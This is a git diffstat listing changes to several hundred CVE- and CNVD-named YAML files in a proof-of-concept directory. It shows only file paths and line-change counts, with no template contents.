poc/cve/CVE-2017-10271.yaml | 25 +- poc/cve/CVE-2017-11586.yaml | 49 +- poc/cve/CVE-2017-11610.yaml | 23 +- poc/cve/CVE-2017-12544.yaml | 29 +- poc/cve/CVE-2017-12635.yaml | 26 +- poc/cve/CVE-2017-12794.yaml | 37 +- poc/cve/CVE-2017-14135.yaml | 26 +- poc/cve/CVE-2017-14524.yaml | 39 +- poc/cve/CVE-2017-15363.yaml | 43 +- poc/cve/CVE-2017-17043.yaml | 28 +- poc/cve/CVE-2017-17451.yaml | 28 +- poc/cve/CVE-2017-18024.yaml | 31 +- poc/cve/CVE-2017-18536.yaml | 27 +- poc/cve/CVE-2017-4011.yaml | 24 +- poc/cve/CVE-2017-6090.yaml | 35 +- poc/cve/CVE-2018-0101.yaml | 7 +- poc/cve/CVE-2018-1000226.yaml | 54 +- poc/cve/CVE-2018-10822.yaml | 19 +- poc/cve/CVE-2018-11776.yaml | 17 +- poc/cve/CVE-2018-12031.yaml | 22 +- poc/cve/CVE-2018-12300.yaml | 27 +- poc/cve/CVE-2018-13380.yaml | 24 +- poc/cve/CVE-2018-13980.yaml | 24 +- poc/cve/CVE-2018-14013.yaml | 39 +- poc/cve/CVE-2018-14912.yaml | 27 +- poc/cve/CVE-2018-14916.yaml | 20 +- poc/cve/CVE-2018-14931.yaml | 21 +- poc/cve/CVE-2018-15535.yaml | 22 +- poc/cve/CVE-2018-15961.yaml | 27 +- poc/cve/CVE-2018-16288.yaml | 23 +- poc/cve/CVE-2018-16671.yaml | 34 +- poc/cve/CVE-2018-16716.yaml | 18 +- poc/cve/CVE-2018-18608.yaml | 24 +- poc/cve/CVE-2018-18775.yaml | 49 +- poc/cve/CVE-2018-18778.yaml | 40 +- poc/cve/CVE-2018-19137.yaml | 21 +- poc/cve/CVE-2018-19326.yaml | 33 +- poc/cve/CVE-2018-19753.yaml | 17 +- poc/cve/CVE-2018-19892.yaml | 27 +- poc/cve/CVE-2018-19914.yaml | 27 +- poc/cve/CVE-2018-20009.yaml | 26 +- poc/cve/CVE-2018-20011.yaml | 24 +- poc/cve/CVE-2018-20470.yaml | 18 +- poc/cve/CVE-2018-3238.yaml | 24 +- poc/cve/CVE-2018-5316.yaml | 36 +- poc/cve/CVE-2018-5715.yaml | 26 +- poc/cve/CVE-2018-6910.yaml | 20 +- poc/cve/CVE-2018-7662.yaml | 19 +- poc/cve/CVE-2018-8033.yaml | 30 +- poc/cve/CVE-2018-9161.yaml | 19 +- poc/cve/CVE-2018-9845.yaml | 19 +- "poc/cve/CVE-2018\342\200\22314064.yaml" | 9 +- poc/cve/CVE-2019-1010290.yaml | 25 +- poc/cve/CVE-2019-10232.yaml | 22 +- poc/cve/CVE-2019-11248.yaml | 16 +- poc/cve/CVE-2019-12276.yaml | 82 +- poc/cve/CVE-2019-12583.yaml | 18 +- poc/cve/CVE-2019-12962.yaml | 27 +- poc/cve/CVE-2019-13396.yaml | 23 +- poc/cve/CVE-2019-14205.yaml | 79 +- poc/cve/CVE-2019-14251.yaml | 22 +- poc/cve/CVE-2019-15811.yaml | 29 +- poc/cve/CVE-2019-16123.yaml | 25 +- poc/cve/CVE-2019-16931.yaml | 28 +- poc/cve/CVE-2019-16997.yaml | 24 +- poc/cve/CVE-2019-17538.yaml | 17 +- poc/cve/CVE-2019-18371.yaml | 20 +- poc/cve/CVE-2019-19824.yaml | 20 +- poc/cve/CVE-2019-20354.yaml | 16 +- poc/cve/CVE-2019-2729.yaml | 23 +- poc/cve/CVE-2019-6112.yaml | 32 +- poc/cve/CVE-2019-7315.yaml | 22 +- poc/cve/CVE-2019-7543.yaml | 28 +- poc/cve/CVE-2019-7609.yaml | 35 +- poc/cve/CVE-2019-8937.yaml | 53 +- poc/cve/CVE-2019-9082 (copy 2).yaml | 24 + poc/cve/CVE-2019-9082.yaml | 1 - poc/cve/CVE-2019-9915.yaml | 24 +- poc/cve/CVE-2019-9922.yaml | 25 +- poc/cve/CVE-2020-10124 (copy 1).yaml | 32 + poc/cve/CVE-2020-10124.yaml | 3 +- poc/cve/CVE-2020-10549.yaml | 34 +- poc/cve/CVE-2020-11738.yaml | 38 +- poc/cve/CVE-2020-13158.yaml | 20 +- poc/cve/CVE-2020-13405.yaml | 24 +- poc/cve/CVE-2020-13945.yaml | 22 +- poc/cve/CVE-2020-14092.yaml | 40 +- poc/cve/CVE-2020-14408.yaml | 29 +- poc/cve/CVE-2020-15227.yaml | 28 +- poc/cve/CVE-2020-17456.yaml | 35 +- poc/cve/CVE-2020-17519.yaml | 30 +- poc/cve/CVE-2020-17530.yaml | 18 +- poc/cve/CVE-2020-1956.yaml | 57 +- poc/cve/CVE-2020-20988.yaml | 25 +- poc/cve/CVE-2020-21224.yaml | 26 +- poc/cve/CVE-2020-22208.yaml | 19 +- poc/cve/CVE-2020-22209.yaml | 19 +- poc/cve/CVE-2020-22210.yaml | 39 +- poc/cve/CVE-2020-24579.yaml | 36 +- poc/cve/CVE-2020-25780.yaml | 34 +- poc/cve/CVE-2020-26876.yaml | 37 +- poc/cve/CVE-2020-26919.yaml | 19 +- poc/cve/CVE-2020-26948.yaml | 27 +- poc/cve/CVE-2020-27735.yaml | 85 +- poc/cve/CVE-2020-28871.yaml | 36 +- poc/cve/CVE-2020-28976.yaml | 42 +- poc/cve/CVE-2020-35580.yaml | 24 +- poc/cve/CVE-2020-35729.yaml | 45 +- poc/cve/CVE-2020-35736.yaml | 14 +- poc/cve/CVE-2020-3580.yaml | 33 +- poc/cve/CVE-2020-35847.yaml | 83 +- poc/cve/CVE-2020-6637.yaml | 107 +- poc/cve/CVE-2020-7943.yaml | 46 +- poc/cve/CVE-2020-8641.yaml | 22 +- poc/cve/CVE-2020-8644.yaml | 40 +- poc/cve/CVE-2020-8654.yaml | 42 +- poc/cve/CVE-20200924a.yaml | 6 + poc/cve/CVE-2021-1498.yaml | 23 +- poc/cve/CVE-2021-20090.yaml | 88 +- poc/cve/CVE-2021-20114.yaml | 27 +- poc/cve/CVE-2021-20123.yaml | 37 +- poc/cve/CVE-2021-21389.yaml | 44 +- poc/cve/CVE-2021-21479.yaml | 19 +- poc/cve/CVE-2021-21745.yaml | 20 +- poc/cve/CVE-2021-21799.yaml | 23 +- poc/cve/CVE-2021-21801.yaml | 31 +- poc/cve/CVE-2021-21881.yaml | 29 +- poc/cve/CVE-2021-22054.yaml | 17 +- poc/cve/CVE-2021-22214.yaml | 25 +- poc/cve/CVE-2021-22502.yaml | 62 +- poc/cve/CVE-2021-24236.yaml | 31 +- poc/cve/CVE-2021-24245.yaml | 34 +- poc/cve/CVE-2021-24286.yaml | 63 +- poc/cve/CVE-2021-24300.yaml | 25 +- poc/cve/CVE-2021-24340.yaml | 59 +- poc/cve/CVE-2021-24342.yaml | 28 +- poc/cve/CVE-2021-24406.yaml | 34 +- poc/cve/CVE-2021-24472.yaml | 40 +- poc/cve/CVE-2021-24750.yaml | 20 +- poc/cve/CVE-2021-24947.yaml | 31 +- poc/cve/CVE-2021-25008.yaml | 24 +- poc/cve/CVE-2021-25063.yaml | 31 +- poc/cve/CVE-2021-25074.yaml | 34 +- poc/cve/CVE-2021-25085.yaml | 24 +- poc/cve/CVE-2021-25111.yaml | 34 +- poc/cve/CVE-2021-25112.yaml | 34 +- poc/cve/CVE-2021-25118.yaml | 35 +- poc/cve/CVE-2021-26702.yaml | 22 +- poc/cve/CVE-2021-26812.yaml | 28 +- poc/cve/CVE-2021-27309.yaml | 22 +- poc/cve/CVE-2021-27748.yaml | 22 +- poc/cve/CVE-2021-28377.yaml | 21 +- poc/cve/CVE-2021-28854.yaml | 17 +- poc/cve/CVE-2021-29484.yaml | 29 +- poc/cve/CVE-2021-29490.yaml | 37 +- poc/cve/CVE-2021-30049.yaml | 24 +- poc/cve/CVE-2021-3019.yaml | 41 +- poc/cve/CVE-2021-31249.yaml | 37 +- poc/cve/CVE-2021-31250.yaml | 39 +- poc/cve/CVE-2021-31755.yaml | 19 +- poc/cve/CVE-2021-31805.yaml | 21 +- poc/cve/CVE-2021-32172.yaml | 36 +- poc/cve/CVE-2021-3223.yaml | 29 +- poc/cve/CVE-2021-32820.yaml | 51 +- poc/cve/CVE-2021-34643.yaml | 37 +- poc/cve/CVE-2021-35265.yaml | 42 +- poc/cve/CVE-2021-35464.yaml | 36 +- poc/cve/CVE-2021-37416.yaml | 36 +- poc/cve/CVE-2021-37589.yaml | 21 +- poc/cve/CVE-2021-38702.yaml | 28 +- poc/cve/CVE-2021-39211.yaml | 23 +- poc/cve/CVE-2021-39350.yaml | 25 +- poc/cve/CVE-2021-40539.yaml | 22 +- poc/cve/CVE-2021-40822.yaml | 34 +- poc/cve/CVE-2021-40859.yaml | 26 +- poc/cve/CVE-2021-40868.yaml | 29 +- poc/cve/CVE-2021-40960.yaml | 23 +- poc/cve/CVE-2021-41174.yaml | 29 +- poc/cve/CVE-2021-41266.yaml | 31 +- poc/cve/CVE-2021-41282.yaml | 39 +- poc/cve/CVE-2021-41569.yaml | 22 +- poc/cve/CVE-2021-41691.yaml | 19 +- poc/cve/CVE-2021-41878.yaml | 44 +- poc/cve/CVE-2021-42192.yaml | 41 +- poc/cve/CVE-2021-43062.yaml | 26 +- poc/cve/CVE-2021-44077.yaml | 22 +- poc/cve/CVE-2021-44228.yaml | 74 +- poc/cve/CVE-2021-44521.yaml | 50 +- poc/cve/CVE-2021-44528.yaml | 28 +- poc/cve/CVE-2021-45046.yaml | 39 +- poc/cve/CVE-2021-46379.yaml | 17 +- poc/cve/CVE-2021-46387.yaml | 23 +- poc/cve/CVE-2021-46422.yaml | 24 +- poc/cve/CVE-2022-0140.yaml | 26 +- poc/cve/CVE-2022-0149.yaml | 27 +- poc/cve/CVE-2022-0165.yaml | 26 +- poc/cve/CVE-2022-0201.yaml | 24 +- poc/cve/CVE-2022-0208.yaml | 37 +- poc/cve/CVE-2022-0271.yaml | 33 +- poc/cve/CVE-2022-0378.yaml | 25 +- poc/cve/CVE-2022-0543.yaml | 30 +- poc/cve/CVE-2022-0591.yaml | 40 +- poc/cve/CVE-2022-0594.yaml | 26 +- poc/cve/CVE-2022-0656.yaml | 25 +- poc/cve/CVE-2022-0776.yaml | 24 +- poc/cve/CVE-2022-0952.yaml | 28 +- ...e-2022-0963(1).yaml => CVE-2022-0963.yaml} | 0 poc/cve/CVE-2022-0968.yaml | 42 +- poc/cve/CVE-2022-1040.yaml | 21 +- poc/cve/CVE-2022-1054.yaml | 24 +- poc/cve/CVE-2022-1221.yaml | 27 +- poc/cve/CVE-2022-1386.yaml | 44 +- poc/cve/CVE-2022-1597.yaml | 31 +- poc/cve/CVE-2022-1609.yaml | 18 +- poc/cve/CVE-2022-1713.yaml | 19 +- poc/cve/CVE-2022-1724.yaml | 25 +- poc/cve/CVE-2022-1946.yaml | 29 +- poc/cve/CVE-2022-21500.yaml | 27 +- poc/cve/CVE-2022-2187.yaml | 26 +- poc/cve/CVE-2022-22536.yaml | 36 +- poc/cve/CVE-2022-22947.yaml | 25 +- poc/cve/CVE-2022-22963.yaml | 27 +- poc/cve/CVE-2022-22965.yaml | 40 +- poc/cve/CVE-2022-22972.yaml | 64 +- poc/cve/CVE-2022-23779.yaml | 37 +- poc/cve/CVE-2022-24129.yaml | 24 +- poc/cve/CVE-2022-24681.yaml | 41 +- poc/cve/CVE-2022-24856.yaml | 24 +- poc/cve/CVE-2022-2486.yaml | 24 +- poc/cve/CVE-2022-2487.yaml | 27 +- poc/cve/CVE-2022-2488.yaml | 23 +- poc/cve/CVE-2022-26135.yaml | 4 - poc/cve/CVE-2022-26233.yaml | 22 +- poc/cve/CVE-2022-26564.yaml | 23 +- poc/cve/CVE-2022-26960.yaml | 17 +- poc/cve/CVE-2022-28079.yaml | 22 +- poc/cve/CVE-2022-28080.yaml | 25 +- poc/cve/CVE-2022-29301.yaml | 16 +- poc/cve/CVE-2022-29303.yaml | 27 +- poc/cve/CVE-2022-29383.yaml | 21 +- poc/cve/CVE-2022-29455.yaml | 36 +- poc/cve/CVE-2022-29464.yaml | 20 +- poc/cve/CVE-2022-30073.yaml | 42 +- poc/cve/CVE-2022-30489.yaml | 24 +- poc/cve/CVE-2022-30525.yaml | 19 +- poc/cve/CVE-2022-30776.yaml | 25 +- poc/cve/CVE-2022-30777.yaml | 26 +- poc/cve/CVE-2022-31268.yaml | 24 +- poc/cve/CVE-2022-32025.yaml | 27 +- poc/cve/CVE-2022-32026.yaml | 33 +- poc/cve/CVE-2022-34046.yaml | 29 +- poc/cve/CVE-2022-34047.yaml | 29 +- poc/cve/CVE-2022-34049.yaml | 23 +- poc/cve/CVE-2022-35416.yaml | 22 +- poc/cve/CVE-2022-36883.yaml | 40 +- poc/cve/CVE-2022-42889.yaml | 75 +- poc/cve/CVE-2023-23752.yaml | 52 +- poc/cve/CVE-2023-24044.yaml | 22 +- poc/cve/apache-solr-log4j-CVE-2021-44228.yaml | 7 +- poc/cve/apache-solr-log4j-cve-2021-44228.yaml | 17 + poc/cve/cnnvd-200705-315-1035.yaml | 3 + poc/cve/cnvd-2019-01348-1040.yaml | 32 - poc/cve/cnvd-2019-01348-1042.yaml | 33 + poc/cve/cnvd-2019-01348-1043.yaml | 16 +- poc/cve/cnvd-2019-06255-1046.yaml | 37 - poc/cve/cnvd-2019-06255-1048.yaml | 33 + poc/cve/cnvd-2019-06255-1049.yaml | 22 +- poc/cve/cnvd-2019-06255-1050.yaml | 14 +- poc/cve/cnvd-2019-19299-1051.yaml | 17 +- poc/cve/cnvd-2019-19299-1052.yaml | 14 +- poc/cve/cnvd-2020-23735-1058.yaml | 24 + poc/cve/cnvd-2020-23735-1059.yaml | 23 - poc/cve/cnvd-2020-46552-1060.yaml | 34 + poc/cve/cnvd-2020-56167-1062.yaml | 9 +- poc/cve/cnvd-2020-62422-1065.yaml | 5 +- poc/cve/cnvd-2020-62422-1067.yaml | 30 - poc/cve/cnvd-2020-62422-1068.yaml | 27 + poc/cve/cnvd-2020-67113-1070.yaml | 43 - poc/cve/cnvd-2020-67113-1072.yaml | 25 +- poc/cve/cnvd-2020-68596-1074.yaml | 42 + poc/cve/cnvd-2020-68596-1076.yaml | 26 +- poc/cve/cnvd-2021-01931-1078.yaml | 26 - poc/cve/cnvd-2021-01931-1079.yaml | 33 + poc/cve/cnvd-2021-10543-1084.yaml | 33 + poc/cve/cnvd-2021-10543-1086.yaml | 21 - poc/cve/cnvd-2021-15822-1090.yaml | 4 +- poc/cve/cnvd-2021-15822-1095.yaml | 23 - poc/cve/cnvd-2021-15824-1096.yaml | 10 +- poc/cve/cnvd-2021-17369-1098.yaml | 37 + poc/cve/cnvd-2021-17369-1101.yaml | 24 - poc/cve/cnvd-2021-17369-1102.yaml | 17 +- poc/cve/cnvd-2021-26422-1104.yaml | 38 - poc/cve/cnvd-2021-28277-1105.yaml | 44 + poc/cve/cnvd-2021-49104-1115.yaml | 11 +- poc/cve/cnvd-2022-03672-1116.yaml | 13 +- poc/cve/cve-2001-1473.yaml | 34 + poc/cve/cve-2002-1131-1304.yaml | 43 - poc/cve/cve-2004-0519-1305.yaml | 37 + poc/cve/cve-2006-2842-1331.yaml | 37 + poc/cve/cve-2007-4504.yaml | 30 - poc/cve/cve-2008-6080.yaml | 31 - poc/cve/cve-2008-6172-1387.yaml | 27 - poc/cve/cve-2009-0545.yaml | 40 - poc/cve/cve-2009-0932-1409.yaml | 28 - poc/cve/cve-2009-1496.yaml | 31 - poc/cve/cve-2009-2100-1446.yaml | 37 - poc/cve/cve-2009-3053.yaml | 31 + poc/cve/cve-2010-0219-1491.yaml | 46 + poc/cve/cve-2010-0696-1498.yaml | 27 - poc/cve/cve-2010-0942-1511.yaml | 27 + poc/cve/cve-2010-0942.yaml | 29 + poc/cve/cve-2010-0943.yaml | 30 - poc/cve/cve-2010-0972-1522.yaml | 26 + poc/cve/cve-2010-1219.yaml | 30 + poc/cve/cve-2010-1307-1585.yaml | 26 + poc/cve/cve-2010-1307.yaml | 30 + poc/cve/cve-2010-1308.yaml | 29 - poc/cve/cve-2010-1312.yaml | 30 - poc/cve/cve-2010-1345.yaml | 29 - poc/cve/cve-2010-1352-1625.yaml | 26 - poc/cve/cve-2010-1353-1630.yaml | 28 - poc/cve/cve-2010-1469-1647.yaml | 27 - poc/cve/cve-2010-1470-1653.yaml | 30 + poc/cve/cve-2010-1474.yaml | 29 - poc/cve/cve-2010-1475.yaml | 29 + poc/cve/cve-2010-1491.yaml | 30 - poc/cve/cve-2010-1494.yaml | 29 + poc/cve/cve-2010-1532.yaml | 30 - poc/cve/cve-2010-1601-1739.yaml | 28 - poc/cve/cve-2010-1607.yaml | 30 + poc/cve/cve-2010-1653-1759.yaml | 28 + poc/cve/cve-2010-1657-1761.yaml | 27 + poc/cve/cve-2010-1657.yaml | 30 + poc/cve/cve-2010-1659.yaml | 30 + poc/cve/cve-2010-1714-1779.yaml | 30 - poc/cve/cve-2010-1715.yaml | 30 + poc/cve/cve-2010-1875-1829.yaml | 28 - poc/cve/cve-2010-1878-1830.yaml | 28 - poc/cve/cve-2010-1954-1848.yaml | 28 - poc/cve/cve-2010-1955-1852.yaml | 30 - poc/cve/cve-2010-1982-1886.yaml | 34 + poc/cve/cve-2010-1982.yaml | 34 + poc/cve/cve-2010-2122-1928.yaml | 32 + poc/cve/cve-2010-2122.yaml | 34 + poc/cve/cve-2010-2680.yaml | 34 + poc/cve/cve-2010-2920.yaml | 33 + poc/cve/cve-2010-4977-2017.yaml | 32 + poc/cve/cve-2010-5028-2025.yaml | 29 - poc/cve/cve-2011-0049-2036.yaml | 34 + poc/cve/cve-2011-3315-2059.yaml | 25 - poc/cve/cve-2011-5107.yaml | 48 + poc/cve/cve-2011-5179.yaml | 48 - poc/cve/cve-2012-0896.yaml | 33 - poc/cve/cve-2012-0901.yaml | 49 + poc/cve/cve-2012-0981.yaml | 33 - poc/cve/cve-2012-0991-2151.yaml | 33 + poc/cve/cve-2012-0991.yaml | 33 + poc/cve/cve-2012-4242.yaml | 47 + poc/cve/cve-2013-2251-2239.yaml | 45 + poc/cve/cve-2013-4117-2265.yaml | 32 - poc/cve/cve-2013-5979-2280.yaml | 28 - poc/cve/cve-2013-7091-2285.yaml | 41 + poc/cve/cve-2013-7240-2290.yaml | 36 - poc/cve/cve-2014-3120-2316.yaml | 59 - poc/cve/cve-2014-4513-2344.yaml | 38 - poc/cve/cve-2014-4536-2350.yaml | 39 + poc/cve/cve-2014-5368-2394.yaml | 34 + poc/cve/cve-2014-5368.yaml | 35 + poc/cve/cve-2015-1000012-2461.yaml | 38 - poc/cve/cve-2015-1880-2477.yaml | 31 - poc/cve/cve-2015-2067-2482.yaml | 25 - poc/cve/cve-2015-2080-2489.yaml | 35 + poc/cve/cve-2015-4050-2522.yaml | 29 - poc/cve/cve-2015-5531-2565.yaml | 51 + poc/cve/cve-2015-8813-2620.yaml | 27 - poc/cve/cve-2016-1000131-2664.yaml | 34 + poc/cve/cve-2016-1000138-2698.yaml | 33 - poc/cve/cve-2016-1000154-2740.yaml | 34 + poc/cve/cve-2016-10940-2757.yaml | 45 - poc/cve/cve-2016-2004-2774.yaml | 31 - poc/cve/cve-2017-1000029-2833.yaml | 27 + poc/cve/cve-2017-1000486-2845.yaml | 37 - poc/cve/cve-2017-10271-2858.yaml | 98 - poc/cve/cve-2017-11610-2874.yaml | 51 + poc/cve/cve-2017-12544-2890.yaml | 34 + poc/cve/cve-2017-12635-2913.yaml | 55 + poc/cve/cve-2017-14135-2925.yaml | 43 - poc/cve/cve-2017-14849.yaml | 43 + poc/cve/cve-2017-15363-2948.yaml | 33 - poc/cve/cve-2017-17043-2977.yaml | 34 - poc/cve/cve-2017-17451-2983.yaml | 34 + poc/cve/cve-2017-18024-2992.yaml | 39 + poc/cve/cve-2017-18536-2995.yaml | 32 - poc/cve/cve-2017-3528.yaml | 40 - poc/cve/cve-2017-6090-3044.yaml | 44 - poc/cve/cve-2017-9506.yaml | 42 + poc/cve/cve-2018-0296.yaml | 49 + poc/cve/cve-2018-1000129.yaml | 57 - poc/cve/cve-2018-1000226-3139.yaml | 51 + poc/cve/cve-2018-10822-3178.yaml | 36 + poc/cve/cve-2018-11409.yaml | 46 - poc/cve/cve-2018-11776-3210.yaml | 37 - poc/cve/cve-2018-12031-3222.yaml | 34 + poc/cve/cve-2018-12300-3240.yaml | 28 - poc/cve/cve-2018-13380-3285.yaml | 41 - poc/cve/cve-2018-13980-3294.yaml | 29 + poc/cve/cve-2018-14013-3296.yaml | 30 + poc/cve/cve-2018-14912-3315.yaml | 27 + poc/cve/cve-2018-14916-3319.yaml | 31 - poc/cve/cve-2018-14931-3325.yaml | 26 - poc/cve/cve-2018-15473.yaml | 29 - poc/cve/cve-2018-15961-3347.yaml | 59 + poc/cve/cve-2018-16288-3365.yaml | 32 + poc/cve/cve-2018-16671-3394.yaml | 27 - poc/cve/cve-2018-16716-3396.yaml | 29 - poc/cve/cve-2018-18264.yaml | 49 - poc/cve/cve-2018-18775-3446.yaml | 25 - poc/cve/cve-2018-19326-3464.yaml | 34 + poc/cve/cve-2018-19753-3488.yaml | 37 - poc/cve/cve-2018-19892(1).yaml | 51 - poc/cve/cve-2018-19914(1).yaml | 46 - poc/cve/cve-2018-20009(1).yaml | 47 - poc/cve/cve-2018-20011(1).yaml | 47 + poc/cve/cve-2018-20470-3497.yaml | 39 + poc/cve/cve-2018-3167.yaml | 47 + poc/cve/cve-2018-3238-3537.yaml | 47 + poc/cve/cve-2018-5715(1).yaml | 37 + poc/cve/cve-2018-6910-3585.yaml | 31 - poc/cve/cve-2018-7662-3617.yaml | 37 - poc/cve/cve-2018-8033-3632.yaml | 36 + poc/cve/cve-2018-9161-3658.yaml | 34 - poc/cve/cve-2018-9845-3664.yaml | 37 - "poc/cve/cve-2018\342\200\22314064.yaml" | 21 + poc/cve/cve-2019-1010290-3700.yaml | 25 - poc/cve/cve-2019-10232-3703.yaml | 40 + poc/cve/cve-2019-11248-3731.yaml | 37 + poc/cve/cve-2019-12314.yaml | 43 + poc/cve/cve-2019-12583(1).yaml | 33 - poc/cve/cve-2019-12962(1).yaml | 40 + poc/cve/cve-2019-13396-3812.yaml | 52 + poc/cve/cve-2019-14251(1).yaml | 31 - poc/cve/cve-2019-14470.yaml | 50 - poc/cve/cve-2019-15043.yaml | 64 - poc/cve/cve-2019-15811(1).yaml | 42 + poc/cve/cve-2019-15889.yaml | 52 - poc/cve/cve-2019-16123-3918.yaml | 31 - poc/cve/cve-2019-16759.yaml | 50 + poc/cve/cve-2019-16931(1).yaml | 41 + poc/cve/cve-2019-16997-3966.yaml | 37 + poc/cve/cve-2019-17538-3994.yaml | 32 - poc/cve/cve-2019-17558.yaml | 74 + poc/cve/cve-2019-18371(1).yaml | 31 + poc/cve/cve-2019-18394.yaml | 39 + poc/cve/cve-2019-19368.yaml | 44 + poc/cve/cve-2019-19824-4053.yaml | 33 + poc/cve/cve-2019-20354(1).yaml | 18 + poc/cve/cve-2019-2729-4114.yaml | 52 - poc/cve/cve-2019-3799.yaml | 44 - poc/cve/cve-2019-6112-4178.yaml | 30 + poc/cve/cve-2019-7315(1).yaml | 29 + poc/cve/cve-2019-7543-4231.yaml | 33 + poc/cve/cve-2019-7609-4233.yaml | 35 + poc/cve/cve-2019-8937-4278.yaml | 36 + poc/cve/cve-2019-9082-4292.yaml | 23 - poc/cve/cve-2019-9915(1).yaml | 32 + poc/cve/cve-2019-9922(1).yaml | 28 + poc/cve/cve-2020-10124(1).yaml | 31 - poc/cve/cve-2020-10220.yaml | 50 - poc/cve/cve-2020-10549-4379.yaml | 29 + poc/cve/cve-2020-11738(1).yaml | 45 - poc/cve/cve-2020-13158(1).yaml | 28 + poc/cve/cve-2020-13405(1).yaml | 43 + poc/cve/cve-2020-13937.yaml | 53 - poc/cve/cve-2020-13942.yaml | 82 - poc/cve/cve-2020-13945-4535.yaml | 58 - poc/cve/cve-2020-14092-4540.yaml | 29 + poc/cve/cve-2020-14408(1).yaml | 35 - poc/cve/cve-2020-16139.yaml | 48 - poc/cve/cve-2020-16920.yaml | 53 - poc/cve/cve-2020-16952.yaml | 55 - poc/cve/cve-2020-17456-4666.yaml | 50 + poc/cve/cve-2020-17519-4692.yaml | 30 - poc/cve/cve-2020-17530-4696.yaml | 33 - poc/cve/cve-2020-20988(1).yaml | 43 - poc/cve/cve-2020-21224-4749.yaml | 36 - poc/cve/cve-2020-22208(1).yaml | 32 - poc/cve/cve-2020-22209(1).yaml | 32 + poc/cve/cve-2020-22210(1).yaml | 32 + poc/cve/cve-2020-22210.yaml | 32 +- poc/cve/cve-2020-22840.yaml | 39 + poc/cve/cve-2020-23517.yaml | 52 + poc/cve/cve-2020-24579-4833.yaml | 40 + poc/cve/cve-2020-25540.yaml | 44 + poc/cve/cve-2020-25780-4895.yaml | 49 + poc/cve/cve-2020-26919-4928.yaml | 31 + poc/cve/cve-2020-26948-4935.yaml | 35 + poc/cve/cve-2020-28976-4989.yaml | 30 - poc/cve/cve-2020-29395.yaml | 50 - poc/cve/cve-2020-3452(1).yaml | 31 - poc/cve/cve-2020-3452.yaml | 24 +- poc/cve/cve-2020-35580-5049.yaml | 24 - poc/cve/cve-2020-35729-5065.yaml | 36 + poc/cve/cve-2020-35736-5068.yaml | 34 + poc/cve/cve-2020-3580-5085.yaml | 38 - poc/cve/cve-2020-35847-5094.yaml | 27 + poc/cve/cve-2020-5284.yaml | 47 + poc/cve/cve-2020-5405.yaml | 42 - poc/cve/cve-2020-7943-5259.yaml | 33 - poc/cve/cve-2020-8115.yaml | 43 + poc/cve/cve-2020-8163.yaml | 44 + poc/cve/cve-2020-8641-5330.yaml | 32 + poc/cve/cve-2020-8654(1).yaml | 41 + poc/cve/cve-20200924a.yaml | 33 + poc/cve/cve-2021-20114-5462.yaml | 30 - poc/cve/cve-2021-20123-5463.yaml | 30 - poc/cve/cve-2021-21389-5513.yaml | 47 - poc/cve/cve-2021-21402.yaml | 54 - poc/cve/cve-2021-21479-5524.yaml | 33 - poc/cve/cve-2021-21745(1).yaml | 34 + poc/cve/cve-2021-21799(1).yaml | 37 + poc/cve/cve-2021-21801-5531.yaml | 32 - poc/cve/cve-2021-21881-5544.yaml | 38 + poc/cve/cve-2021-22054(1).yaml | 32 + poc/cve/cve-2021-22214-5601.yaml | 41 - poc/cve/cve-2021-22502(1).yaml | 37 - poc/cve/cve-2021-24236(1).yaml | 80 + poc/cve/cve-2021-24245(1).yaml | 39 + poc/cve/cve-2021-24286(1).yaml | 21 + poc/cve/cve-2021-24300(1).yaml | 44 - poc/cve/cve-2021-24340-5711.yaml | 38 - poc/cve/cve-2021-24342-5715.yaml | 37 + poc/cve/cve-2021-24406-5736.yaml | 22 - poc/cve/cve-2021-24472-5744.yaml | 32 + poc/cve/cve-2021-25008(1).yaml | 40 - poc/cve/cve-2021-25063-5794.yaml | 40 + poc/cve/cve-2021-25085(1).yaml | 37 - poc/cve/cve-2021-25118(1).yaml | 39 + poc/cve/cve-2021-26702(1).yaml | 31 + poc/cve/cve-2021-26812-5884.yaml | 32 + poc/cve/cve-2021-27309(1).yaml | 36 + poc/cve/cve-2021-27748(1).yaml | 33 + poc/cve/cve-2021-28377(1).yaml | 27 - poc/cve/cve-2021-28854-5972.yaml | 30 + poc/cve/cve-2021-29490-6011.yaml | 28 - poc/cve/cve-2021-3019-6041.yaml | 30 + poc/cve/cve-2021-30461.yaml | 2 +- poc/cve/cve-2021-31249-6068.yaml | 23 + poc/cve/cve-2021-31250-6070.yaml | 30 - poc/cve/cve-2021-3129.yaml | 94 + poc/cve/cve-2021-31755-6106.yaml | 33 - poc/cve/cve-2021-31805(1).yaml | 48 + poc/cve/cve-2021-32172-6126.yaml | 51 - poc/cve/cve-2021-3223(1).yaml | 35 - poc/cve/cve-2021-32820-6148.yaml | 20 + poc/cve/cve-2021-34643-6238.yaml | 42 - poc/cve/cve-2021-35265-6245.yaml | 33 + poc/cve/cve-2021-35464-6252.yaml | 44 - poc/cve/cve-2021-37416(1).yaml | 38 + poc/cve/cve-2021-37589(1).yaml | 55 - poc/cve/cve-2021-38702-6314.yaml | 34 - poc/cve/cve-2021-39211(1).yaml | 31 - poc/cve/cve-2021-39350-6344.yaml | 48 + poc/cve/cve-2021-40539-6368.yaml | 107 + poc/cve/cve-2021-40822(1).yaml | 42 + poc/cve/cve-2021-41174-6409.yaml | 45 + poc/cve/cve-2021-41569(1).yaml | 28 - poc/cve/cve-2021-41691-6460.yaml | 45 + poc/cve/cve-2021-42192(1).yaml | 73 + poc/cve/cve-2021-44077(1).yaml | 32 - poc/cve/cve-2021-44521-6556.yaml | 56 + poc/cve/cve-2021-44528(1).yaml | 35 - poc/cve/cve-2021-45046.yaml | 66 - poc/cve/cve-2021-46387-6601.yaml | 38 + poc/cve/cve-2021-46422(1).yaml | 40 + poc/cve/cve-2022-0140(1).yaml | 36 - poc/cve/cve-2022-0165(1).yaml | 26 - poc/cve/cve-2022-0201(1).yaml | 31 - poc/cve/cve-2022-0208(1).yaml | 34 - poc/cve/cve-2022-0378-6624.yaml | 35 - poc/cve/cve-2022-0543(1).yaml | 35 + poc/cve/cve-2022-0594(1).yaml | 37 - poc/cve/cve-2022-0656(1).yaml | 37 - poc/cve/cve-2022-0776(1).yaml | 31 - poc/cve/cve-2022-0952(1).yaml | 47 + poc/cve/cve-2022-0963.yaml | 75 - poc/cve/cve-2022-0968(1).yaml | 68 - poc/cve/cve-2022-1040(1).yaml | 42 + poc/cve/cve-2022-1054(1).yaml | 29 - poc/cve/cve-2022-1221(1).yaml | 37 + poc/cve/cve-2022-1386(1).yaml | 90 + poc/cve/cve-2022-1597(1).yaml | 56 - poc/cve/cve-2022-1609(1).yaml | 35 + 